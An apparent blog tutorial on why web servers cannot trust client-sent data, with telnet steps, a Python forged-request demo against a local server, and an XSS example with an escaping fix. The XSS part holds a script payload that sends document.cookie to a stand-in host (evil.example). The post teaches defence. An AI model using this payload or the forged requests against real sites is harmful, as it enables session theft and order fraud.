Understanding JavaScript Hacking

Today I somehow landed on a page about JavaScript hacking. I found the article interesting, so I decided to search Google on the subject: http://www.google.com.fj/search?q=javascript+hacking

To my annoyance, none of the articles (I only read three and got too annoyed) really helped the reader understand how to defend themselves against “JavaScript Hacking”, or what it really is and why it's possible.

Most explained how to “hack with JavaScript” and read more like tutorials for script kiddies than actual information for web developers.

What is JavaScript Hacking

The gist of it is that you can enter a javascript: URL such as:
javascript:alert(document.cookie);
into the browser's address bar to read (and, by assigning to document.cookie, rewrite) the cookies of the page you are on. (Try it on a page you are logged in to. Two caveats: current browsers block javascript: URLs in the address bar or strip the javascript: prefix when it is pasted, so the same code is usually run from the developer console instead; and cookies flagged HttpOnly do not show up in document.cookie at all, although they are still sent with every request and can still be altered from outside the browser.)

You can also change any form element on the page the same way, including hidden fields:

javascript:alert(document.forms['formname'].fieldname.value="I changed you");
In fact the whole web page can be modified from there.

Most developers will be bored now..

The only reason this is even an issue, and the reason I'm writing this little piece, is that some developers assume that hidden form fields, URLs, cookies and the like cannot be changed by the user.

If you believe this, you are a hazard to your web server. Please turn your web server off, it will thank you.

Life of your web server

The web server, when online, waits for HTTP requests from a client (usually a web browser). An HTTP request is a plain-text message asking for a web page or some other resource believed to exist on your server. Your server then replies with an HTTP response, another text message.

Now, when a web client makes an HTTP request to your server, it can send anything at all. It could be “bla bla bla”. Of course your server will not understand this, and it will say so (typically with a 400 Bad Request response).

If the client sends something the server does understand, such as a request for the index page:

GET / HTTP/1.1
Host: www.example.com

then the server at www.example.com replies with the HTML of the index page, preceded by a status line and response headers of its own.

Send an HTTP GET Request via Windows Telnet

You can try this out for yourself without a web browser.

On Windows (the Telnet client is an optional feature on current versions, so enable it under Windows Features first if the command is not found):

  • Open the Command Prompt (Start -> Run -> [type in cmd])
  • In the command prompt type in: telnet www.example.com 80
  • Now type in the HTTP request (Telnet does not echo what you type by default, so type carefully; a typo gets you a 400 Bad Request instead of the page):
    GET / HTTP/1.1
    Host: www.example.com
    Connection: close
  • Hit Enter twice. The empty line is what tells the server the headers are finished.
You should see the response headers followed by the HTML source of the index page on www.example.com. (The Connection: close line is optional; it makes the server close the connection after the reply instead of holding it open for another request.)
(You can do exactly the same thing in a Linux shell with telnet, or with nc www.example.com 80.)

Now do those steps again, but this time send the server “bla bla bla” followed by the empty line. It will answer with an error such as 400 Bad Request.

Now you see that you can send whatever you want to a web server. HTML forms and hidden fields are just text. The only reason some developers think they can be trusted is that they have only ever seen them inside a web browser, which does not let an ordinary user edit the page without some knowledge of “JavaScript Hacking”. (Today's browsers don't even require that: the built-in developer tools and any number of extensions let you edit form fields, rewrite the HTML and change whatever you want.)

An attacker of your server or your scripts will more likely edit the HTTP request with a tool other than the web browser (an intercepting proxy, a small script, or even the command prompt as above).

What to Expect from a web client (browser)

As a web developer, you should always assume that any data reaching your script over HTTP can be bogus: any value, any characters, any encoding. Not because “JavaScript Hacking” can alter HTML elements rendered in a browser, but because of the nature of the HTTP protocol itself.

Even the user's IP address, the HTTP Referer (note it's spelled wrongly; blame those who wrote the HTTP specs), cookies, everything in an HTTP request is whatever the sender wants it to be if they use the command prompt as explained. (The IP address is not part of the HTTP request but of the underlying IP packet, and that can be forged as well. In practice a forged source address never completes the TCP handshake, so it is of little use for HTTP, but the X-Forwarded-For header that proxies add, which many scripts read as “the user's IP”, is plain text like everything else.)
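The telnet walk-through and the paragraph above make the same point: the server receives nothing but the text the client chose to send. Here is that idea as an added example in Python, not code from the original post. It starts a stand-in server on loopback that trusts the Referer, the cookie and a hidden price field the way a naive script would, then sends it a request built by hand, byte for byte, the way you would type it into telnet. All the values (the /checkout path, shop.example, the role=admin cookie, the 0.01 price) are constructed for the demonstration.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# What the last request looked like from the server's side. Filled in by the handler.
LAST_REQUEST = {}


class TrustingHandler(BaseHTTPRequestHandler):
    """Stand-in for a server script that believes hidden fields, Referer and cookies."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode("utf-8", "replace")
        LAST_REQUEST.clear()
        LAST_REQUEST.update({
            "referer": self.headers.get("Referer"),
            "cookie": self.headers.get("Cookie"),
            "user_agent": self.headers.get("User-Agent"),
            # A hidden field arrives as ordinary form data; the server cannot tell it apart.
            "form": {k: v[0] for k, v in parse_qs(body).items()},
        })
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"order accepted\n")

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_server():
    """Bind to a free loopback port and serve in a background thread."""
    server = HTTPServer(("127.0.0.1", 0), TrustingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def forged_request(port, price="0.01", referer="https://shop.example/checkout",
                   cookie="session=abc; role=admin"):
    """Build the raw HTTP text by hand, exactly as you would type it into telnet.
    Every value is chosen by the 'client'; none of it came from a browser. (Constructed values.)"""
    body = f"item=widget&qty=1&price={price}"  # price would be a hidden field in the real form
    return "\r\n".join([
        "POST /checkout HTTP/1.1",
        f"Host: 127.0.0.1:{port}",
        f"Referer: {referer}",
        f"Cookie: {cookie}",
        "User-Agent: definitely-a-real-browser/1.0",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "Connection: close",
        "",  # the empty line that ends the headers
        body,
    ]).encode("ascii")


def send_raw(port, raw):
    """Push bytes down a TCP socket and collect whatever comes back."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(raw)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def demo():
    """Send the forged request to the trusting server and return what it believed."""
    server = start_server()
    try:
        port = server.server_address[1]
        response = send_raw(port, forged_request(port))
        seen = dict(LAST_REQUEST)
        seen["status_line"] = response.split(b"\r\n", 1)[0].decode()
        return seen
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it and the server reports a Referer of shop.example, a cookie claiming role=admin and a price of 0.01, because that is literally what was written on the wire; it has no way to know whether a browser, telnet or this script produced the bytes. The fix is not on the client side at all: the price must come from the server's own catalogue, and the cookie must be something the server issued and can verify.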

It's like sending a letter. You can write any return address on it, and any gibberish inside it, to fool whoever it is addressed to. Just because there are rules/protocols for writing a letter doesn't mean they will be followed. And just as with HTTP, you can send a fake letter to “Joe Example” at “Example Place” in order to attack his sanity.

Please, please, don't trust anything your clients send to your server, for your server's sake and your own.

Protecting your server-side scripts is a topic in itself, but with this knowledge it should come easily: validate everything on the server, and never treat a hidden field, a cookie or a header as proof of anything the user could not legitimately have set.

True JavaScript Hacking

Don't disregard “JavaScript Hacking” altogether, though. There is such a thing. It works on the browser and on the web surfer, not on your server code: it tricks a user's browser into running script it should not. (The crafted HTTP request I showed is what is used against insecure server-side scripting.)

By itself, “JavaScript Hacking” harms nobody but the person typing it into their own address bar. But when a script on your server copies request data back into a page without encoding it, an attacker can put JavaScript into a request (a link they get the victim to click, or a comment they post) and your server will serve that script to your other users, whose browsers run it with their cookies and session. That is cross-site scripting (XSS), and it is how the two kinds of “hacking” combine.
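To make the last paragraph concrete, here is an added example, written for this page rather than taken from the original post: a stand-in server script that greets the user by the name parameter from the query string, first as a naive developer would write it and then with output encoding. The evil.example host and the cookie-stealing payload are constructed for the demonstration.

```python
import html
from urllib.parse import urlencode, parse_qs

# Constructed sample: the query string an attacker would get a victim to click.
# The payload ships the victim's cookies to a host the attacker controls.
ATTACK_QUERY = urlencode({
    "name": "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"
})


def greet_vulnerable(query_string: str) -> str:
    """Echoes the 'name' parameter straight into HTML.
    Whatever the request contained, script tags included, is served to the user."""
    name = parse_qs(query_string).get("name", [""])[0]
    return f"<h1>Hello, {name}!</h1>"


def greet_hardened(query_string: str) -> str:
    """Same script with output encoding: the HTML metacharacters < > & " ' become entities,
    so the browser displays the attacker's text instead of executing it."""
    name = parse_qs(query_string).get("name", [""])[0]
    return f"<h1>Hello, {html.escape(name, quote=True)}!</h1>"


def contains_live_script(page: str) -> bool:
    """Crude check for the demo: is there an unencoded <script> tag in the page?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", greet_vulnerable(ATTACK_QUERY))
    print("hardened:  ", greet_hardened(ATTACK_QUERY))
```

The hardened version renders the payload as visible text (`&lt;script&gt;...`) instead of a script element. Note that html.escape is the right encoding only for text placed in HTML body or attribute context; data dropped into a JavaScript string, a URL or a CSS value needs the encoding for that context, which is why the rule is "encode for the context you are writing into", not just "call escape".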

Well, it's a bit late here, so I'll cut this article short and write on how to secure your website/server later. Please leave a comment if you want.. :)

 
